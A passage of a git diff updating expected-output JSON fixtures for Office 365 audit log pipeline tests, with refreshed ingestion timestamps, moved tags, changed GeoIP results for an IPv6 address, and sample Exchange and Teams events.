(1432b)\",\"Id\":\"RgAAAACklF6sEsJgSK/ulVd531/WBwCzgXIUnq3lQqXFeCmxHwmHAAAAAAEMAACzgXIUnq3lQqXFeCmxHwmHAAAAABULAAAJ\",\"InternetMessageId\":\"\\u003cAM6PR01MB4535D305187FEC8127CF8EDFEE160@AM6PR01MB4535.eurprd01.prod.exchangelabs.com\\u003e\",\"IsRecord\":false,\"ParentFolder\":{\"Id\":\"LgAAAACklF6sEsJgSK/ulVd531/WAQCzgXIUnq3lQqXFeCmxHwmHAAAAAAEMAAAB\",\"Path\":\"\\\\Inbox\"},\"Subject\":\"The new SIEMTest group is ready\"},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"26286ffa-073d-45ff-9fe9-539891984d69\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26680073\",\"MailboxOwnerUPN\":\"SIEMTest@testsiem.onmicrosoft.com\",\"Operation\":\"Create\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"AM6PR01MB4535 (67.43.156.13)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeItem", "provider": "Exchange", 
@@ -164,7 +164,7 @@ "ip": "::1" }, "event": { - "ingested": "2021-12-09T13:42:42.659935500Z", + "ingested": "2021-12-14T14:49:39.335745234Z", "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:46\",\"ExternalAccess\":true,\"Id\":\"c0790552-9989-4e91-cba4-08d7b386e642\",\"InternalLogonType\":1,\"Item\":{\"Attachments\":\"warming_email_03_2017_calendar.png (598b); warming_email_03_2017_conversation.png (613b); warming_email_03_2017_links.png (1402b); google_play_store_badge.png (4823b); apple_store_badge.png (4445b); windows_store_badge.png (3680b); warming_email_03_2017_files.png (808b); warming_email_03_2017_sharePoint.png (1431b)\",\"Id\":\"RgAAAABQ7FIOAzxlR4hKCRQRbTbvBwBTdQb34omtRrZGvP+4ONQkAAAAAAEMAABTdQb34omtRrZGvP+4ONQkAAAAAA0lAAAJ\",\"InternetMessageId\":\"\\u003cDB3PR0102MB35003D203E5553CBC1B8AAEAE2160@DB3PR0102MB3500.eurprd01.prod.exchangelabs.com\\u003e\",\"IsRecord\":false,\"ParentFolder\":{\"Id\":\"LgAAAABQ7FIOAzxlR4hKCRQRbTbvAQBTdQb34omtRrZGvP+4ONQkAAAAAAEMAAAB\",\"Path\":\"\\\\Inbox\"},\"Subject\":\"The new All Company group is ready\"},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"778e6fd9-b5d5-4431-a10f-245bde6e0cb8\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679883\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.eqpfynvc@testsiem.onmicrosoft.com\",\"Operation\":\"Create\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB3PR0102MB3500 (67.43.156.13)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeItem", "provider": "Exchange", 
@@ -256,7 +256,7 @@ "ip": "::1" }, "event": { - "ingested": "2021-12-09T13:42:42.659941200Z", + "ingested": "2021-12-14T14:49:39.335745743Z", "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:31\",\"ExternalAccess\":true,\"Id\":\"c6b58ed7-a54a-47cf-a301-08d7b386dd7c\",\"InternalLogonType\":1,\"Item\":{\"Attachments\":\"warming_email_03_2017_calendar.png (598b); warming_email_03_2017_conversation.png (613b); warming_email_03_2017_links.png (1402b); google_play_store_badge.png (4823b); apple_store_badge.png (4445b); windows_store_badge.png (3680b); warming_email_03_2017_files.png (808b); warming_email_03_2017_sharePoint.png (1431b)\",\"Id\":\"RgAAAABkkJvTy6NaRYV8EL+vMtzZBwAk6unHVumCRJNhRrAMRwYLAAAAAAEMAAAk6unHVumCRJNhRrAMRwYLAAAAAAk9AAAJ\",\"InternetMessageId\":\"\\u003cDB7PR01MB442884FC2132AE2A909799BAFC160@DB7PR01MB4428.eurprd01.prod.exchangelabs.com\\u003e\",\"IsRecord\":false,\"ParentFolder\":{\"Id\":\"LgAAAABkkJvTy6NaRYV8EL+vMtzZAQAk6unHVumCRJNhRrAMRwYLAAAAAAEMAAAB\",\"Path\":\"\\\\Inbox\"},\"Subject\":\"The new All Company group is ready\"},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"685170f5-2238-470d-824b-239a02afafbd\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679882\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.sqtielgo@testsiem.onmicrosoft.com\",\"Operation\":\"Create\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB7PR01MB4428 (67.43.156.13)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeItem", "provider": "Exchange", 
@@ -348,7 +348,7 @@ "ip": "::1" }, "event": { - "ingested": "2021-12-09T13:42:42.659946600Z", + "ingested": "2021-12-14T14:49:39.335746252Z", "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:41\",\"ExternalAccess\":true,\"Id\":\"815684be-4e52-4cb2-9242-08d7b386e333\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAABQ7FIOAzxlR4hKCRQRbTbvAQBTdQb34omtRrZGvP+4ONQkAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAABQ7FIOAzxlR4hKCRQRbTbvAQBTdQb34omtRrZGvP+4ONQkAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Visible, FreeBusySimple, FreeBusyDetailed\",\"MemberSid\":\"S-1-8-2005823449-1144108501-1529089953-3087822558-1\",\"MemberUpn\":\"Member@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"778e6fd9-b5d5-4431-a10f-245bde6e0cb8\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679883\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.eqpfynvc@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB3PR0102MB3500 (67.43.156.13)\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeItem", "provider": "Exchange", 
@@ -440,7 +440,7 @@ "ip": "::1" }, "event": { - "ingested": "2021-12-09T13:42:42.659952200Z", + "ingested": "2021-12-14T14:49:39.335746713Z", "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:22\",\"ExternalAccess\":true,\"Id\":\"f5b56c26-18aa-4984-822e-08d7b386d7e2\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAABkkJvTy6NaRYV8EL+vMtzZAQAk6unHVumCRJNhRrAMRwYLAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAABkkJvTy6NaRYV8EL+vMtzZAQAk6unHVumCRJNhRrAMRwYLAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Create, EditOwned, DeleteOwned, EditAny, DeleteAny, Visible, FreeBusySimple, FreeBusyDetailed\",\"MemberSid\":\"S-1-8-1750167797-1192043064-2586004354-3182407426-0\",\"MemberUpn\":\"Owner@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"685170f5-2238-470d-824b-239a02afafbd\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679882\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.sqtielgo@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB7PR01MB4428 (67.43.156.13)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeItem", "provider": "Exchange", 
@@ -532,7 +532,7 @@ "ip": "::1" }, "event": { - "ingested": "2021-12-09T13:42:42.659957700Z", + "ingested": "2021-12-14T14:49:39.335747147Z", "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:22\",\"ExternalAccess\":true,\"Id\":\"25ccad93-82ad-4742-5231-08d7b386d7e6\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAABkkJvTy6NaRYV8EL+vMtzZAQAk6unHVumCRJNhRrAMRwYLAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAABkkJvTy6NaRYV8EL+vMtzZAQAk6unHVumCRJNhRrAMRwYLAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Visible, FreeBusySimple, FreeBusyDetailed\",\"MemberSid\":\"S-1-8-1750167797-1192043064-2586004354-3182407426-1\",\"MemberUpn\":\"Member@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"685170f5-2238-470d-824b-239a02afafbd\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679882\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.sqtielgo@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB7PR01MB4428 (67.43.156.13)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeItem", "provider": "Exchange", 
@@ -624,7 +624,7 @@ "ip": "::1" }, "event": { - "ingested": "2021-12-09T13:42:42.659963600Z", + "ingested": "2021-12-14T14:49:39.335747680Z", "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:41\",\"ExternalAccess\":true,\"Id\":\"edb9bb1f-9629-43a1-0a57-08d7b386e31c\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAABQ7FIOAzxlR4hKCRQRbTbvAQBTdQb34omtRrZGvP+4ONQkAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAABQ7FIOAzxlR4hKCRQRbTbvAQBTdQb34omtRrZGvP+4ONQkAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Create, EditOwned, DeleteOwned, EditAny, DeleteAny, Visible, FreeBusySimple, FreeBusyDetailed\",\"MemberSid\":\"S-1-8-2005823449-1144108501-1529089953-3087822558-0\",\"MemberUpn\":\"Owner@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"778e6fd9-b5d5-4431-a10f-245bde6e0cb8\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679883\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.eqpfynvc@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB3PR0102MB3500 (67.43.156.13)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeItem", "provider": "Exchange", 
@@ -716,7 +716,7 @@ "ip": "::1" }, "event": { - "ingested": "2021-12-09T13:42:42.659969200Z", + "ingested": "2021-12-14T14:49:39.335748268Z", "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T17:12:03\",\"ExternalAccess\":true,\"Id\":\"df63d186-b4d9-49a8-748c-08d7b3cc81fb\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAACklF6sEsJgSK/ulVd531/WAQCzgXIUnq3lQqXFeCmxHwmHAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAACklF6sEsJgSK/ulVd531/WAQCzgXIUnq3lQqXFeCmxHwmHAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Create, EditOwned, DeleteOwned, EditAny, DeleteAny, Visible, FreeBusySimple, FreeBusyDetailed\",\"MemberSid\":\"S-1-8-640184314-1174341437-2555636127-1766693009-1\",\"MemberUpn\":\"Member@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"26286ffa-073d-45ff-9fe9-539891984d69\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26680073\",\"MailboxOwnerUPN\":\"SIEMTest@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"AM6PR01MB4535 (67.43.156.13)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeItem", "provider": "Exchange", 
@@ -808,7 +808,7 @@ "ip": "::1" }, "event": { - "ingested": "2021-12-09T13:42:42.659974700Z", + "ingested": "2021-12-14T14:49:39.335748733Z", "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T17:12:03\",\"ExternalAccess\":true,\"Id\":\"284dfe85-ab53-48ad-0863-08d7b3cc81f7\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAACklF6sEsJgSK/ulVd531/WAQCzgXIUnq3lQqXFeCmxHwmHAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAACklF6sEsJgSK/ulVd531/WAQCzgXIUnq3lQqXFeCmxHwmHAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Create, EditOwned, DeleteOwned, EditAny, DeleteAny, Visible, FreeBusySimple, FreeBusyDetailed\",\"MemberSid\":\"S-1-8-640184314-1174341437-2555636127-1766693009-0\",\"MemberUpn\":\"Owner@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"26286ffa-073d-45ff-9fe9-539891984d69\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26680073\",\"MailboxOwnerUPN\":\"SIEMTest@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"AM6PR01MB4535 (67.43.156.13)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeItem", "provider": "Exchange", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-ip-formats-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-ip-formats-events.json-expected.json index dc54941893b..88e9f7fbbcc 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-ip-formats-events.json-expected.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-ip-formats-events.json-expected.json 
@@ -26,7 +26,7 @@ "ip": "10.11.12.13" }, "event": { - "ingested": "2021-12-09T13:42:43.978949100Z", + "ingested": "2021-12-14T14:49:40.627655470Z", "original": "{\"ClientIP\":\"[10.11.12.13]:12345\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", "kind": "event", "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", @@ -71,7 +71,7 @@ "ip": "10.11.12.13" }, "event": { - "ingested": "2021-12-09T13:42:43.978959100Z", + "ingested": "2021-12-14T14:49:40.627658808Z", "original": "{\"ClientIP\":\"10.11.12.13:12345\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", "kind": "event", "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", @@ -114,7 +114,7 @@ "ip": "10.11.12.13" }, "event": { - "ingested": "2021-12-09T13:42:43.978963500Z", + "ingested": "2021-12-14T14:49:40.627659344Z", "original": "{\"ClientIP\":\"10.11.12.13\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", "kind": "event", "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", @@ -157,7 +157,7 @@ "ip": "10.11.12.13" }, "event": { - "ingested": "2021-12-09T13:42:43.978967600Z", + "ingested": "2021-12-14T14:49:40.627659813Z", "original": "{\"ClientIP\":\"::ffff:10.11.12.13\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", "kind": "event", "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", @@ -202,7 +202,7 @@ "ip": "10.11.12.13" }, "event": { - "ingested": "2021-12-09T13:42:43.978971100Z", + "ingested": "2021-12-14T14:49:40.627660334Z", "original": "{\"ClientIP\":\"[::ffff:10.11.12.13]:12345\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", "kind": "event", "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", 
@@ -245,24 +245,18 @@ "source": { "geo": { "continent_name": "Europe", - "country_name": "Denmark", + "country_name": "Norway", "location": { "lon": 10.0, - "lat": 56.0 + "lat": 62.0 }, - "country_iso_code": "DK" - }, - "as": { - "number": 62121, - "organization": { - "name": "Christian Ebsen ApS" - } + "country_iso_code": "NO" }, "port": 12345, "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "event": { - "ingested": "2021-12-09T13:42:43.978975700Z", + "ingested": "2021-12-14T14:49:40.627660793Z", "original": "{\"ClientIP\":\"[2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6]:12345\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", "kind": "event", "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", @@ -304,23 +298,17 @@ "source": { "geo": { "continent_name": "Europe", - "country_name": "Denmark", + "country_name": "Norway", "location": { "lon": 10.0, - "lat": 56.0 + "lat": 62.0 }, - "country_iso_code": "DK" - }, - "as": { - "number": 62121, - "organization": { - "name": "Christian Ebsen ApS" - } + "country_iso_code": "NO" }, "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "event": { - "ingested": "2021-12-09T13:42:43.978981800Z", + "ingested": "2021-12-14T14:49:40.627661244Z", "original": "{\"ClientIP\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", "kind": "event", "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", @@ -354,7 +342,7 @@ "domain": "[2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6]" }, "event": { - "ingested": "2021-12-09T13:42:43.978987800Z", + "ingested": "2021-12-14T14:49:40.627661689Z", "original": "{\"ClientIP\":\"[2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6]\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", "kind": "event", "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", 
@@ -385,7 +373,7 @@ "domain": "[10.11.12.13]" }, "event": { - "ingested": "2021-12-09T13:42:43.978993800Z", + "ingested": "2021-12-14T14:49:40.627662187Z", "original": "{\"ClientIP\":\"[10.11.12.13]\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", "kind": "event", "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", @@ -416,7 +404,7 @@ "domain": "localhost" }, "event": { - "ingested": "2021-12-09T13:42:43.978999700Z", + "ingested": "2021-12-14T14:49:40.627662646Z", "original": "{\"ClientIP\":\"localhost\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", "kind": "event", "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", @@ -447,7 +435,7 @@ "domain": "[localhost]:12345" }, "event": { - "ingested": "2021-12-09T13:42:43.979005600Z", + "ingested": "2021-12-14T14:49:40.627663101Z", "original": "{\"ClientIP\":\"[localhost]:12345\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", "kind": "event", "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", @@ -478,7 +466,7 @@ "domain": "localhost:12345" }, "event": { - "ingested": "2021-12-09T13:42:43.979012Z", + "ingested": "2021-12-14T14:49:40.627663734Z", "original": "{\"ClientIP\":\"localhost:12345\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", "kind": "event", "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", @@ -509,7 +497,7 @@ "domain": "[cool.client.local]:12345" }, "event": { - "ingested": "2021-12-09T13:42:43.979018Z", + "ingested": "2021-12-14T14:49:40.627664186Z", "original": "{\"ClientIP\":\"[cool.client.local]:12345\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", "kind": "event", "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", 
@@ -540,7 +528,7 @@ "domain": "cool.client.local" }, "event": { - "ingested": "2021-12-09T13:42:43.979024Z", + "ingested": "2021-12-14T14:49:40.627664701Z", "original": "{\"ClientIP\":\"cool.client.local\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", "kind": "event", "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", @@ -571,7 +559,7 @@ "domain": "cool.client.local:12345" }, "event": { - "ingested": "2021-12-09T13:42:43.979030Z", + "ingested": "2021-12-14T14:49:40.627665148Z", "original": "{\"ClientIP\":\"cool.client.local:12345\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", "kind": "event", "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-ms-teams-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-ms-teams-events.json-expected.json index 445df521aee..de766073faa 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-ms-teams-events.json-expected.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-ms-teams-events.json-expected.json @@ -25,7 +25,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:44.905415600Z", + "ingested": "2021-12-14T14:49:41.313667872Z", "original": "{\"CreationTime\":\"2020-02-17T16:59:44\",\"Id\":\"49fa9883-50a9-4c9c-8e12-57e0948a9d8a\",\"Operation\":\"TeamCreated\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":25,\"TeamGuid\":\"19:5ad83cb367fc48358e759dccff238f46@thread.skype\",\"TeamName\":\"SIEMTest\",\"UserId\":\"Application\",\"UserKey\":\"\",\"UserType\":5,\"Version\":1,\"Workload\":\"MicrosoftTeams\"}", "code": "MicrosoftTeams", "provider": "MicrosoftTeams", @@ -54,9 +54,6 @@ } }, { - "tags": [ - "preserve_original_event" - ], "o365": { "audit": { "RecordType": "25", 
@@ -113,7 +110,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:44.905426400Z", + "ingested": "2021-12-14T14:49:41.313670760Z", "original": "{\"CreationTime\":\"2020-02-17T16:59:47\",\"Id\":\"3a951c24-3214-5529-b2fe-097628a39ecd\",\"ItemName\":\"SIEMTest\",\"Members\":[{\"DisplayName\":\"David\",\"Role\":1,\"UPN\":\"david@testsiem.onmicrosoft.com\"},{\"DisplayName\":\"Chuck\",\"Role\":1,\"UPN\":\"chuck@testsiem.onmicrosoft.com\"},{\"DisplayName\":\"Bob\",\"Role\":1,\"UPN\":\"bob@testsiem.onmicrosoft.com\"},{\"DisplayName\":\"Alice\",\"Role\":1,\"UPN\":\"alice@testsiem.onmicrosoft.com\"}],\"Operation\":\"MemberAdded\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":25,\"TeamGuid\":\"19:5ad83cb367fc48358e759dccff238f46@thread.skype\",\"TeamName\":\"SIEMTest\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"UserType\":0,\"Version\":1,\"Workload\":\"MicrosoftTeams\"}", "code": "MicrosoftTeams", "provider": "MicrosoftTeams", @@ -137,14 +134,14 @@ "email": "asr@testsiem.onmicrosoft.com", "domain": "testsiem.onmicrosoft.com" }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "SIEMTest" } }, { - "tags": [ - "preserve_original_event" - ], "o365": { "audit": { "RecordType": "25", 
